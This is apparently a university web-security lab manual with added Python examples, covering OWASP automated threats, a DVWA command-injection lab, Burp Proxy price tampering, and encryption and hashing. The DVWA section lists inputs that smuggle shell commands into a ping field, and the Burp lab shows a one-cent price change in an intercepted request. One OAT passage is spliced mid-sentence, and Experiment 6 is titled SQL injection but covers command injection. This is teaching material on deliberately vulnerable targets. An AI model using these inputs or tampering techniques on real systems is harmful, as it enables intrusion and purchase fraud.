• OAT-005 Scalping: Checks on the availability of in-demand inventory and buys it up. If you are experiencing unexplained traffic increases to low or limited-availability inventory, you might be the subject of a scalping bot.
• OAT-013 Sniping: Grabs inventory at the last minute. If some of your "customers" are having amazing success at scooping up inventory at the last minute, you may be the target of a sniping bot.
• OAT-021 Denial of Inventory: Ties up stock that never gets purchased, leading real customers to search elsewhere for their desired items.
• OAT-017 Spamming: Adds phony comments to forums and other messaging applications to falsify information or distribute malware.

Checkout Abuse: automated threats related to payment cards or gift cards

19
ICOE/IT/7TH SEM/SAD/LAB MANUAL

oOAT-001 Carding: Similar to credential stuffing, except that it uses stolen credit card numbers to
see which ones are valid. You can look for an increase in failed payments and chargebacks to identify a carding
attack.

oOAT-002 Token Cracking: Much like credential cracking, except that it tries out token codes in a bid to take
advantage of discounts, coupons, etc.

oOAT-010 Card Cracking: Tries to identify expiration dates, card security codes, and more via brute
force attacks to complete the card info. This kind of automated threat is often combined with OAT-001
Carding to verify the card details and OAT-12 Cashing Out to purchase items. The remaining automated
threats relate to Web Apps and Infrastructure of e-Commerce businesses:

●OAT-003 Ad Fraud: Falsifies the number of ad clicks or impressions to siphon off or deplete marketing
budgets.

●OAT-004 Fingerprinting: Sends requests to infrastructure and profiles it for later exploitation.

●OAT-006 Expediting: Uses bots to speed up normal processes.

●OAT-009 CAPTCHA Defeat: Bots and services, such as CATPCHA farms, can solve CAPTCHA challenges and
tests for humans to prove that they’re not robots.

●OAT-011 (Price and Content) Scraping: Lots of bots scrape data with intent to resell or even duplicate
competitors’ content, leading to lower SEO rankings, among other things.

●OAT-014 Vulnerability Scanning: Unauthorized scanning that identifiesvulnerabilities that malicious


bot operators can exploit.

●OAT-015 (Application) Denial of Service (DoS): Deliberate, malicious overwhelming of the application’s
resources, which can either slow down or render a website or web app unavailable for customers to use.

●OAT-016 Skewing: Fraudulent requests for content or synthetic bot traffic that degrades the accuracy
of web metrics. Much like fingerprinting, but specific to probing the application itself to find out its
vulnerabilities tacks and the lost revenue associated with them. If bots and other automated threats overwhelm
your site and take your online store down for just two days, you have easily lost a inimum of $548K
in revenue. Suppose the same business protects just 50% of its traffic with a bot management solution. In
that case, it’s $50 million (or $137K per day) that the organization can count on annually and not
lose to downtime caused by bots, along with the additional financial impact associated with online fraud such
as successful credential stuffing, carding and cracking attacks. The list of potential business and financial impacts
of bot attacks is endless. What Can You Do about Automated Threats in e-Commerce?The only way to fight
automation is with automation. That’s because adversaries adapt in

seconds, and traditional bot detection solutions can’t keep up. What’s needed is an approach that instantly
detects and defends against bots, even those not seen before, using a zero-trust approach to ensure that
nothing unknown or untrusted gets in. Such a solution should operate without heuristics to learn, rules to
manage, or risk scores to assign — and must be resilient to retooling and reverse-engineering efforts. Essentially,
a tool that fights back and makes attacks too expensive to conduct and frustrates and deceives attackers, while
adapting to new threats in real time. To win the game of whack-a-mole, you must architect your solution to be
just as effective years from now as it is today, while eliminating the economic imbalance between attacks and
defenders.
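As an added example (it is not part of the lab manual or the OWASP OAT project), the Python sketch below applies the two detection signals the summary above gives for OAT-007 and OAT-008 to a handful of log lines: a spike of failed logins from one source, and whether those failures hit a single account (credential cracking) or many different accounts (credential stuffing). The log format, the thresholds and the log lines themselves are constructed for this demo.

```python
"""Flag credential-cracking / credential-stuffing patterns in authentication logs.

Added example, not code from the lab manual or from OWASP. Log layout, window size
and thresholds are assumptions chosen for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (hypothetical format: ISO time, source IP, user, result).
SAMPLE_LOG = """\
2024-09-01T10:00:01 203.0.113.7 alice FAIL
2024-09-01T10:00:02 203.0.113.7 alice FAIL
2024-09-01T10:00:03 203.0.113.7 alice FAIL
2024-09-01T10:00:04 203.0.113.7 alice FAIL
2024-09-01T10:00:05 203.0.113.7 alice FAIL
2024-09-01T10:00:06 203.0.113.7 alice FAIL
2024-09-01T10:00:10 198.51.100.9 bob FAIL
2024-09-01T10:00:11 198.51.100.9 carol FAIL
2024-09-01T10:00:12 198.51.100.9 dave FAIL
2024-09-01T10:00:13 198.51.100.9 erin FAIL
2024-09-01T10:00:14 198.51.100.9 frank FAIL
2024-09-01T10:00:15 198.51.100.9 grace OK
2024-09-01T10:05:00 192.0.2.20 heidi FAIL
2024-09-01T10:05:30 192.0.2.20 heidi OK
"""

WINDOW = timedelta(minutes=1)   # sliding window length (assumed)
FAIL_THRESHOLD = 5              # failed logins per source inside one window (assumed)
MANY_USERS = 4                  # distinct usernames in the window => stuffing (assumed)


def parse_line(line):
    """Split one constructed log line into (timestamp, source ip, username, result)."""
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result


def classify(log_text):
    """Return {source_ip: 'credential_stuffing' | 'credential_cracking'} for every
    source whose failed logins reach FAIL_THRESHOLD within any WINDOW-long span.
    Few distinct usernames => cracking one account; many => stuffing leaked pairs."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = parse_line(line)
        if result == "FAIL":
            failures[ip].append((ts, user))

    verdicts = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):                 # two-pointer sliding window
            while fails[end][0] - fails[start][0] > WINDOW:
                start += 1
            span = fails[start:end + 1]
            if len(span) >= FAIL_THRESHOLD:
                distinct = len({user for _, user in span})
                verdicts[ip] = ("credential_stuffing" if distinct >= MANY_USERS
                                else "credential_cracking")
                break
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```

The single source hammering one account is reported as cracking, the source cycling through different usernames as stuffing, and the user who mistyped once and then logged in is not reported at all; in a real deployment the thresholds would be tuned per application and the verdicts fed to rate limiting or step-up authentication rather than printed.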

Such a solution protects from the very first request, so that your organization is defended even against bots not seen before. It provides the industry’s most accurate bot detection and has flipped the bot mitigation approach on its head with a fundamentally different approach that identifies the presence of automation itself, and it preserves the user experience because it defends against bots invisibly, without the use of CAPTCHAs.

Conclusion: The OAT Top Web App Threats list represents a broad consensus among security experts on the most common security risks facing organizations.


Experiment – 6: To apply a SQL injection vulnerability that allows a login page to be bypassed.

Objective: Understand and identify the main vulnerabilities inherent in applications.

Outcome: Identify the main vulnerabilities inherent in applications.

Theory: Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficulty, with a simple straightforward interface.

OS command injection vulnerability:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
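To make the defect and its fix concrete, here is an added Python example (DVWA itself is written in PHP; this is not DVWA's code). ping_vulnerable() builds the command by string concatenation and hands it to a shell, the same pattern the low-security level exposes, so an input such as 127.0.0.1&dir becomes two commands; ping_hardened() accepts only an IP address literal and runs ping with an argument list and no shell. The function names, the IP-only allow-list and the looks_injected() log heuristic are this example's own assumptions.

```python
"""Vulnerable vs hardened "ping" handler (added example, not DVWA code).

The IP-literal allow-list is a policy chosen for this demo; an application that
must accept hostnames would validate against a hostname grammar instead.
"""
import ipaddress
import platform
import subprocess

# Characters a shell treats as separators or substitutions (assumed set for the heuristic).
SHELL_METACHARS = set("&|;`$()<>\n\r")


def ping_vulnerable(target):
    """The low-security pattern: user text is concatenated into one command string and
    handed to a shell, which parses '&' and '|' as command separators. Kept only as
    the 'before' picture for comparison."""
    return subprocess.run("ping " + target, shell=True,
                          capture_output=True, text=True).stdout


def is_valid_target(user_input):
    """Allow-list check: only an IPv4/IPv6 address literal is accepted."""
    try:
        ipaddress.ip_address(user_input.strip())
        return True
    except ValueError:
        return False


def validate_target(user_input):
    """Return the normalised address or raise; the only path into ping_hardened()."""
    if not is_valid_target(user_input):
        raise ValueError(f"rejected target {user_input!r}")
    return str(ipaddress.ip_address(user_input.strip()))


def build_ping_argv(target):
    """Argument list for subprocess: no shell parses it, so '&', '|' and friends are
    ordinary bytes inside one argument and can never start a second command."""
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, "1", validate_target(target)]


def ping_hardened(target):
    """Validated input, argv form, shell=False."""
    return subprocess.run(build_ping_argv(target),
                          capture_output=True, text=True).stdout


def looks_injected(user_input):
    """Log/WAF heuristic: flag submissions carrying shell metacharacters for review."""
    return any(ch in SHELL_METACHARS for ch in user_input)
```

Of the two defences, the argument list is the one that removes the vulnerability class; the allow-list additionally keeps ping itself from being pointed at arbitrary names, and looks_injected() is only a detection aid for the lab's own payload strings in request logs.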

Steps to install DVWA:

1. Download and install XAMPP on your computer.

2. Download DVWA from GitHub.

3. Open XAMPP and start ‘Apache’ and ‘MySQL’.

4. Extract the downloaded DVWA file into htdocs, which will be available in C:\xampp.

5. Open the htdocs folder and rename ‘DVWA-master’ to ‘dvwa’.

6. A file named ‘config.inc.php.dist’ will be available in C:\xampp\htdocs\dvwa\config; rename it to ‘config.inc.php’.

7. Type ‘127.0.0.1/dvwa’ in the URL bar of the browser. If you get an error connecting to dvwa, go to step 8.

8. Open config.inc.php in C:\xampp\htdocs\dvwa\config with Notepad and change db_user to root and db_password to blank, as shown in the fig below.


9. Now, again type ‘127.0.0.1/dvwa’ in the URL bar of the browser.

10. Click on ‘Create / Reset Database’.

11. Click on ‘Login’, or it will automatically redirect to the login page.

12. The default username is ‘admin’ and the password is ‘password’; log in with these credentials.

13. Perform OS command injection on DVWA.

Input/Output:

Change the security settings one by one: Low -> Medium -> High -> Impossible.


Command injection on Windows: Low security

Ping 127.0.0.1

127.0.0.1&dir

127.0.0.1|netstat

127.0.0.1|tracert 127.0.0.1


Medium security

Ping 127.0.0.1

127.0.0.1|netstat

127.0.0.1|pathping 127.0.0.1

127.0.0.1|tracert 127.0.0.1

Conclusion: Successfully installed XAMPP and DVWA and performed command injection at all security levels: low, medium and high.


Experiment – 7: To Implement Burp proxy to test web applications


Outcome: Apply data validation and authentication for applications.

Theory:

⮚ What is Burp Suite?


Burp or Burp Suite is a set of tools used for penetration testing of web applications. It is developed by the company named PortSwigger, which is also the alias of its founder Dafydd Stuttard. Burp Suite aims to be an all-in-one set of tools, and its capabilities can be enhanced by installing add-ons that are called BApps. It is the most popular tool among professional web app security researchers and bug bounty hunters. Its ease of use makes it a more suitable choice over free alternatives like OWASP ZAP. Burp Suite is available as a Community Edition, which is free, a Professional Edition that costs $399/year and an Enterprise Edition that costs $3999/year. This article gives a brief introduction to the tools offered by Burp Suite. If you are a complete beginner in web application pentesting/web app hacking/bug bounty, we would recommend that you just read through without thinking too much about any one term.

●Steps to Download and Install Burp Suite:

●Step 1: Download

Use the link below to download the latest version of Burp Suite Professional or Community Edition.

https://portswigger.net/burp/releases/professional-community-2022-8-4?requestededition=community&requestedplatform=

●Step 2: Install

Run the installer and launch Burp Suite. When asked to select a project file and configuration, just click Next and then Start Burp to skip this for now.

●Step 3: Start exploring Burp Suite

If you're completely new to Burp Suite, follow the rest of this tutorial for an interactive, guided tour of the core features.

●Step 4: Intercepting HTTP traffic with Burp Proxy


Intercept HTTP traffic with Burp Proxy

In this tutorial, you'll use a live, deliberately vulnerable website to learn how to intercept requests with Burp Proxy.

Intercepting a request

Burp Proxy lets you intercept HTTP requests and responses sent between Burp's browser and the target server. This enables you to study how the website behaves when you perform different actions.

●Step 1: Launch Burp's browser

Go to the Proxy > Intercept tab. Click the Intercept is off button, so it toggles to Intercept is on.

Click Open Browser. This launches Burp's browser, which is preconfigured to work with Burp right out of the box. Position the windows so that you can see both Burp and Burp's browser.

●Step 2: Intercept a request

Using Burp's browser, try to visit https://portswigger.net and observe that the site doesn't load.

Burp Proxy has intercepted the HTTP request that was issued by the browser before it could reach the server. You can see this intercepted request on the Proxy > Intercept tab.

The request is held here so that you can study it, and even modify it, before forwarding it to the target server.


●Step 3: Forward the request

Click the Forward button several times to send the intercepted request, and any subsequent ones, until the
page loads in Burp's browser.

●Step 4: Switch off interception

Due to the number of requests browsers typically send, you often won't want to intercept every single one of
them. Click the Intercept is on button so that it now says Intercept is off.

Go back to the browser and confirm that you can now interact with the site as normal.

●Step 5: View the HTTP history

In Burp, go to the Proxy > HTTP history tab. Here, you can see the history of all HTTP traffic that has passed
through Burp Proxy, even while interception was switched off. Click on any entry in the history to view the raw
HTTP request, along with the corresponding response from the server.

This lets you explore the website as normal and study the interactions between Burp's browser and the server
afterward, which is more convenient in many cases.

●Steps for Modifying HTTP requests with Burp Proxy

In this tutorial, you'll learn how to modify an intercepted request in Burp Proxy. This enables you to manipulate the request in ways that the website isn't expecting in order to see how it responds. Using one of our deliberately vulnerable websites, known as "labs", you'll see how this can help you identify and exploit real vulnerabilities.

●Step 1: Access the vulnerable website in Burp's browser


In Burp, go to the Proxy > Intercept tab and make sure interception is switched off. Launch Burp's browser and use it to visit the following URL:

https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

When the page loads, click Access the lab. If prompted, log in to your portswigger.net account. After a few seconds, you will see your own instance of a fake shopping website.

●Step 2: Log in to your shopping account

On the shopping website, click My account and log in using the following credentials:

Username: wiener

Password: peter

Notice that you have just $100 of store credit.

●Step 3: Find something to buy

Click Home to go back to the home page. Select the option to view the product details for the Lightweight
"l33t" leather jacket.

●Step 4: Study the add to cart function

In Burp, go to the Proxy > Intercept tab and switch interception on. In the browser, add the leather jacket to your cart to intercept the resulting POST /cart request.


You may initially see a different request on the Proxy > Intercept tab if the browser is doing something else in the background. In this case, just click Forward until you see the POST /cart request as shown in the screenshot above. Study the intercepted request and notice that there is a parameter in the body called price, which matches the price of the item in cents.

●Step 5: Modify the request

Change the value of the price parameter to 1 and click Forward to send the modified request to the server.

Switch interception off again so that any subsequent requests can pass through Burp Proxy uninterrupted.

●Step 6: Exploit the vulnerability

In Burp's browser, click the basket icon in the upper-right corner to view your cart. Notice that the jacket has
been added for just one cent. Note There is no way to modify the price via the web interface. You were only
able to make this change thanks to Burp Proxy. Click the Place order button to purchase the jacket for an
extremely reasonable price. Congratulations, you've also just solved your first Web Security Academy lab!
You've also learned how to intercept, review, and manipulate HTTP traffic using Burp Proxy.
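The lab is solvable only because the server honours a price field that the client sends. As an added example (it is not the Web Security Academy's code and not part of this manual), the Python below puts the vulnerable cart handler next to the hardened one: add_to_cart_vulnerable() trusts the request body, add_to_cart_hardened() looks the price up server-side and records the stray price field as a tamper indicator. The catalogue, the product id, the request shape and the TAMPER_LOG helper are constructed for this demo; the lab's real product ids and prices are not reproduced.

```python
"""Excessive trust in client-side controls: vulnerable vs hardened cart handler.

Added example, not code from the lab or the manual. Prices are in cents, as in
the intercepted request; catalogue contents are placeholders.
"""

# Constructed catalogue: product id -> server-side price in cents (assumed values).
CATALOGUE = {"jacket-1": 133700, "mug-2": 1500}

# Detection record for requests that carry fields a browser-driven purchase never sends.
TAMPER_LOG = []


def add_to_cart_vulnerable(cart, form):
    """The flaw from the lab: the 'price' field of POST /cart is copied into the cart."""
    cart.append({"product": form["productId"],
                 "price_cents": int(form["price"]),
                 "qty": int(form["quantity"])})
    return cart


def add_to_cart_hardened(cart, form):
    """Price comes from the catalogue; quantity is range-checked; a client-supplied
    'price' is ignored and logged, since only a tampered request contains it."""
    pid = form.get("productId")
    if pid not in CATALOGUE:
        raise ValueError("unknown productId")
    qty = int(form.get("quantity", "1"))
    if not 1 <= qty <= 10:
        raise ValueError("quantity out of range")
    if "price" in form:
        TAMPER_LOG.append(f"client sent price={form['price']!r} for {pid}")
    cart.append({"product": pid, "price_cents": CATALOGUE[pid], "qty": qty})
    return cart


def cart_total_cents(cart):
    """Total is recomputed from the stored line items, never taken from the client."""
    return sum(item["price_cents"] * item["qty"] for item in cart)


def place_order(cart, store_credit_cents):
    """Checkout: refuse the order when the server-side total exceeds the credit."""
    total = cart_total_cents(cart)
    if total > store_credit_cents:
        raise ValueError("insufficient store credit")
    return store_credit_cents - total


if __name__ == "__main__":
    tampered = {"productId": "jacket-1", "price": "1", "quantity": "1"}
    print("vulnerable:", place_order(add_to_cart_vulnerable([], tampered), 10000))
    try:
        place_order(add_to_cart_hardened([], tampered), 10000)
    except ValueError as exc:
        print("hardened:", exc, "|", TAMPER_LOG[-1])
```

With the $100 of store credit from the lab (10000 cents) the vulnerable handler lets the one-cent jacket through, while the hardened handler prices it from the catalogue, rejects the order and leaves a log line that points at the tampered request.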

Conclusion: Successfully implemented Burp proxy to test web applications.


Experiment – 8: To study Symmetric and Asymmetric cryptography

Symmetric vs asymmetric encryption. As if understanding the term “encryption” wasn’t hard enough, you’re
now expected to understand the different types of encryption! Well, that’s just how the world of encryption
and public key infrastructure (PKI) is. As you keep digging deeper, you’ll be asked to understand more and
more complicated things. Our brain cells might not be pleased with this, but it’s undoubtedly a good thing as it
gives us a deeper understanding of a technology that protects our data and privacy.

What is Encryption and Why Is It Necessary?

Encryption is the process of turning plaintext data into a scrambled format — so that no unauthorized entity can see what the original data was — through the use of a cryptographic key. But that’s not the only benefit of using different types of encryption — it can also help you to protect the integrity of your data, software and communications, and be compliant with some data security and privacy laws and regulations. Encryption is useful for protecting a variety of personally identifiable information (PII), financial data, intellectual property, and other proprietary information such as:

●Names

●Social security numbers

●Contact information

●Credit card information

●Financial account information

●Credentials

●Technical specs, research, and other sensitive data

Encryption Keys Help to Secure Your Information

Regardless of which type of encryption you’re looking at, it’s going to require a digital key. A cryptographic key is a string of randomly generated characters that’s part of an encryption algorithm. If you compare the process of encryption to locking the door of your home, then the door lock mechanism becomes the encryption, and your physical key becomes the encryption key. However, encryption differs from physical locks in terms of the use of the keys: In encryption, the same key that encrypted the data may or may not be used to decrypt it. This is an example of the difference between symmetric encryption and asymmetric encryption — the two types of encryption we’ll discuss in this article.

Breaking Down Encryption Types and Examples: Symmetric vs Asymmetric Encryption

Symmetric Encryption

In simple terms, symmetric encryption is the simpler and conventional method of securing data. The reason why it’s called “symmetric” is that it’s a process that involves the use of one key by all communicating parties to encrypt and decrypt the data. Here’s a visual breakdown of this method:


An Example of Symmetric Encryption in Action

Let’s understand this with two of our favorite characters (after Homer and Bart Simpson): Alice and Bob.

Let’s say Bob is an undercover spy agent who’s on a secret mission in a foreign country. Alice, on the other
hand, is his case officer who’s monitoring and guiding him. Bob, who’s surrounded by enemies, is
gathering information so that he can send it to Alice. But he has a huge concern: the data that he sends to
Alice might get intercepted by enemies, and he could be exposed.

To prevent that from happening, Alice gives a secret key to Bob and asks him to encrypt all the information before sending it. Bob agrees, and he utilizes this key to encrypt the data. Alice possesses the same key and applies it to decrypt the data and view the secret information. This way, Bob’s identity remains a secret, and the data is passed on to Alice, creating a win-win situation.

Advantages & Disadvantages of Symmetric Encryption

The most significant advantage when it comes to the symmetric encryption method is its simplicity. As it has only one key doing encryption and decryption, symmetric encryption algorithms are considered the faster of the two types of encryption and require less computational power to perform. However, the simplicity of symmetric encryption algorithms isn’t perfect — it has an issue known as “key distribution.” In the case of Bob and Alice, symmetric encryption works just fine as there are only two entities: a sender and a receiver. But what if Alice is gathering information from thousands of sources? If she gives the same key to all of her agents, every piece of data then becomes vulnerable if the key somehow gets exposed. And if Alice gives different symmetric keys to everyone, it means that she must manage thousands of keys, which isn’t a practical thing to do. When you apply this concept to the millions of communications that take place daily between clients (web browsers) and web servers (websites), you’ll realize just how impractical that can be on a large scale.

Asymmetric Encryption:
Asymmetric encryption, as you can guess by its name, involves the use of multiple keys for data encryption
and decryption. To be exact, the asymmetric encryption method comprises two encryption keys that are
mathematically related to each other. These keys are known as the public key and private key. As a result, the
asymmetric encryption method is also known as “public key cryptography.”

An Example of Asymmetric Encryption in Action

Let’s understand this, as you rightly guessed, with the example of Alice and Bob once again. As we mentioned earlier in the symmetric encryption example, Bob is an undercover spy agent who’s on a secret mission in a foreign country and Alice is his case manager. Bob needs to send data in such a way that it doesn’t get intercepted or tampered with by their enemies. But this time, Alice figures out a new way to secure the information and she gives one key, known as the public key, to Bob. Bob is instructed to encrypt his sensitive information using the public key that he has. Alice, on the other end, has the mathematically related private key and can easily decrypt the information he transmits using it.

Here’s how asymmetric encryption works:

Advantages and Disadvantages of Asymmetric Encryption


The reason why asymmetric encryption had to be invented was to solve the key distribution problem that arises in the case of the symmetric encryption method. Therefore, in the case of Bob and Alice, even if the enemies have Bob’s public key, they won’t be able to decipher the information as it can only be decrypted using Alice’s private key. Not only that, but public key cryptography also solves the key management problem even if Alice is getting information from millions of sources. All she has to do is to secure and manage the private key. However, like most things in our world, everything comes with a price — and asymmetric encryption is no different. In this case, that price tag comes in the form of decreased speed and higher computational cost, as this encryption algorithm involves longer keys. This is why, of the two types of encryption, asymmetric encryption is considered slower but more secure.

Hybrid Encryption: Symmetric + Asymmetric Encryption

Both encryption methods, as we saw, have their own advantages as well as disadvantages. So, what if we create a system that has the advantages of both? Well, it’s certainly possible. In many applications, symmetric and asymmetric encryption methods are used together, the secure sockets layer (SSL)/transport layer security (TLS) cryptographic protocols being the foremost of them. In SSL/TLS certificates, first, the identity verification is done utilizing asymmetric encryption. Once the identity of the server has been verified, the encryption process happens using ephemeral symmetric encryption keys. This way, the security risks of symmetric encryption and the performance/speed issues of asymmetric encryption can be mitigated. Cool, isn’t it?
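The Alice-and-Bob story and the hybrid scheme above, as an added runnable example that is not part of the lab manual. To stay inside the Python standard library it uses textbook RSA with two Mersenne primes (2^61-1 and 2^89-1) for the asymmetric part and an XOR stream cipher keyed through HMAC-SHA256 for the symmetric part; both are educational stand-ins for the RSA-OAEP/ECDH key exchange and AES-GCM/ChaCha20-Poly1305 bulk ciphers that TLS actually uses. The key sizes, the function names (rsa_keygen, stream_xor, hybrid_encrypt, hybrid_decrypt, keys_to_manage) and the message are this example's own assumptions.

```python
"""Symmetric, asymmetric and hybrid encryption in one sketch (added example).

Textbook RSA at toy size plus an HMAC-based stream cipher: enough to show the
mechanics and the key-distribution arithmetic, not a construction to deploy.
"""
import hashlib
import hmac
import secrets

# Constructed key parameters (assumed): n = P*Q is about 2^150, so a 128-bit
# session key is always smaller than the modulus.
P = 2**61 - 1
Q = 2**89 - 1
E = 65537


def rsa_keygen(p=P, q=Q, e=E):
    """Alice's key pair: public (n, e), private (n, d) with d = e^-1 mod (p-1)(q-1)."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))          # modular inverse, Python 3.8+
    return (n, e), (n, d)


def rsa_encrypt_int(m, public):
    """Anyone holding the public key can do this."""
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def rsa_decrypt_int(c, private):
    """Only the holder of d can undo it."""
    n, d = private
    return pow(c, d, n)


def stream_xor(key, nonce, data):
    """Toy symmetric cipher: XOR with keystream blocks HMAC-SHA256(key, nonce||counter),
    CTR-style. One key, and the same call both encrypts and decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        counter = (offset // 32).to_bytes(4, "big")
        block = hmac.new(key, nonce + counter, hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], block))
    return bytes(out)


def hybrid_encrypt(plaintext, recipient_public):
    """Bob's side: fresh symmetric session key for the bulk data, wrapped with Alice's
    public key so that only she can recover it."""
    session_key = secrets.token_bytes(16)
    nonce = secrets.token_bytes(12)
    wrapped = rsa_encrypt_int(int.from_bytes(session_key, "big"), recipient_public)
    return {"wrapped_key": wrapped, "nonce": nonce,
            "body": stream_xor(session_key, nonce, plaintext)}


def hybrid_decrypt(message, recipient_private):
    """Alice's side: unwrap the session key with her private key, then decrypt the body."""
    key_int = rsa_decrypt_int(message["wrapped_key"], recipient_private)
    if key_int.bit_length() > 128:
        raise ValueError("unwrapped value is not a valid session key (wrong private key?)")
    session_key = key_int.to_bytes(16, "big")
    return stream_xor(session_key, message["nonce"], message["body"])


def keys_to_manage(parties):
    """The key-distribution problem in numbers: every pair needs its own symmetric key,
    whereas public-key cryptography needs one key pair per party."""
    return {"symmetric": parties * (parties - 1) // 2, "asymmetric": parties}


if __name__ == "__main__":
    alice_public, alice_private = rsa_keygen()
    report = b"Meet at the safe house at dawn."
    sealed = hybrid_encrypt(report, alice_public)      # Bob only ever sees the public key
    assert hybrid_decrypt(sealed, alice_private) == report
    print(keys_to_manage(1000))                        # {'symmetric': 499500, 'asymmetric': 1000}
```

The expensive public-key operation runs once per message on 16 bytes, the cheap symmetric cipher handles the whole body, and the enemy who captures the message and Bob's copy of the public key still lacks d; this is the split the text describes for SSL/TLS, where the session key is additionally ephemeral so that a later key compromise does not expose old traffic.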

Conclusion: Hence we have successfully studied Symmetric and Asymmetric cryptography.


Experiment – 9: To study and understand Hashing

Overview:

Hashes are essential to secure file transfers. You can find them in operations involving passwords,
file integrity checks, digital signatures, digital certificate thumbprints or fingerprints, and others. But
what are hashes? In this post, we'll introduce you to hashes, the concept of hashing, and its applications in
various areas of security.

What is hashing?
Hashing is an operation that takes any string of text, regardless of length or size, as input and then provides a fixed-length string of characters as output. Here are some sample texts and their equivalent hashes:

There are two things that immediately stand out here:

1. The lengths of the equivalent hashes in the examples are exactly the same (in this case 32 characters long), regardless of the lengths of their original text. This is what I meant by hashes having a fixed length. This behavior should hold true even if the original text is a single word or a 1,000-page document; and

2. Even a slight difference in the original text ("the quick" vs "the quikk") results in two different hashes.

We'll dive into the implications of these two characteristics shortly.

Encryption vs Hashing

A hash looks pretty much like the output of an encryption operation (a.k.a. ciphertext), doesn't it? Well, encryption and hashing operations do have similarities. However, they also have a couple of differences. First of all, unlike encryption, hashing is always one way. In fact, hashing is often called "one way encryption". So, while you can decrypt an encrypted text, you cannot "de-hash" a hashed text. We'll see why this can be a useful feature when we explain how hashes are used, e.g. in password authentication systems.

Properties of secure cryptographic hash functions

When hash functions (the underlying functions responsible for mapping the original text into a hash) are used in information security, they must adhere to certain properties. These three are the most important:

1. They must be efficient. The cryptographic hash function must not consume a lot of CPU cycles even if it's made to operate on a huge file.
2. They must be one way functions. Meaning, it should be virtually impossible to obtain the original text (a.k.a. the pre-image of the hash) from the hash.
3. They must have collision resistance. This means that it should be virtually impossible to find two different texts or documents that would yield the same hash.

These are just idealised properties. In the real world, especially with the constant emergence of more powerful computers, it may be impossible to arrive at a hash function that would totally and forever uphold these three properties. Indeed, there are hashing algorithms that are no longer considered secure. Still, strong hashing algorithms can last long enough to be used extensively in securing business transactions until a technology or technique capable of breaking them comes along. Let's take a look at some of the more commonly used hash algorithms.

Commonly used hash algorithms

Some of the commonly used hashing algorithms include:


➢ MD5:
Message Digest 5 or MD5 was developed by Ron Rivest, whose name is immortalised as the R in RSA (a public key cryptosystem common in various secure FTP protocols). MD5 uses multiples of 512 bits as input and produces a 128-bit message digest (or the hash) as output. It is one of the older hashing algorithms but is now known to have certain vulnerabilities in its collision resistance properties.
➢ SHA1
Like the MD5 hash, SHA1 (secure hash algorithm) also takes 512 bits of input at a time. However, its output is 160 bits. SHA-1 was the result of a joint project between the NSA and the NIST. Like MD5, this cryptographic hash function has been proven to be relatively vulnerable to certain collision attacks.
➢ CRC
CRC or Cyclic Redundancy Check is an example of a non-cryptographic hash function. Compared to cryptographic hash functions, CRC hash functions can be easily reversed. Hence, it isn't ideal for applications (e.g. digital signatures) that require functions with strong irreversibility properties. It's more suitable for detecting accidental changes in stored or transmitted files. In other words, it's used for data integrity checks.
➢ SHA-2
Once the SHA1 hash function was found to have potential vulnerabilities, the NSA decided to design a set of stronger hash functions. The resulting product was SHA-2, a family of hash functions with output sizes of 224, 256, 384, and 512 bits. These were known respectively as SHA224, SHA256, SHA384, and SHA512.

We now look at some of the applications of hashing.

Hashing passwords

Secure systems never store passwords in the clear. That is, if you look at a password file, the list of usernames and their corresponding passwords wouldn't look like this:

peter: password1234
james: mac@pRoS
sharon: shadowfax

Instead, it would likely look like this:

peter: uclQZA4bN0DpisuT5mnGV2b2Zw3RYJupH/QQUrpIxvM=
james: xw5UIGACzaNtYyZZjkaRY4a6uoVKhriy7NGLlW+COeM=
sharon: VgGAZRvmCKHoedevnDP2fUHMfuUNTcTL2XqFJGK7/qg=

The strings of characters you see after the usernames are actually hashes (actually, base-64 equivalents of hashes if you want to be more accurate) of each password. When a user logs in, the system first grabs whatever is entered into the password field and converts that into a password hash. It's that hash that's used when looking up the username/password pair in the password file. If a match is found, the user is allowed entry.

That way, even if an attacker gets hold of the password hash file, he wouldn't be able to use that file to log in to the system. Hashing is better than encryption in this case because it eliminates the possibility of the hashed password being converted back to its plaintext equivalent. If you use encryption, it would be possible for an attacker to acquire all passwords (in plaintext) if he were somehow able to acquire the decryption key.

Integrity checking

Remember the second characteristic we were able to observe in the section "What is hashing?" If you recall, we noticed that even the slightest change in the original text can result in an entirely different hash. This characteristic can be put to good use in data integrity checks. Let me give you a simple example.

Let's say a user wants to download an important electronic document from a server. Because the integrity of the data in that document is important to him, he would like to know if the document is altered along the way. One way to achieve this is by using a client and a server that support the same hash function. Before sending the file, the server must first obtain a hash value of the file using that hash function. Once the client receives the file, it too must use the same hash function to generate a hash value. The two hash values must then be compared. If the two values are equal, then it would be safe to conclude that the file has been unchanged.
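The three things described so far (the fixed-length and avalanche properties, the hashed password file, and the download integrity check), as one added Python example that is not part of the lab manual. It uses hashlib throughout; for the password file it goes one step beyond the text's bare base-64 digests and uses PBKDF2-HMAC-SHA256 with a per-user salt, because a bare hash of a password can be attacked offline with precomputed tables. The iteration count, salt length, record format, sample passwords and the constructed document are assumptions of this demo.

```python
"""Hash properties, salted password storage and a download integrity check.

Added example, not the lab manual's code. Standard library only.
"""
import base64
import hashlib
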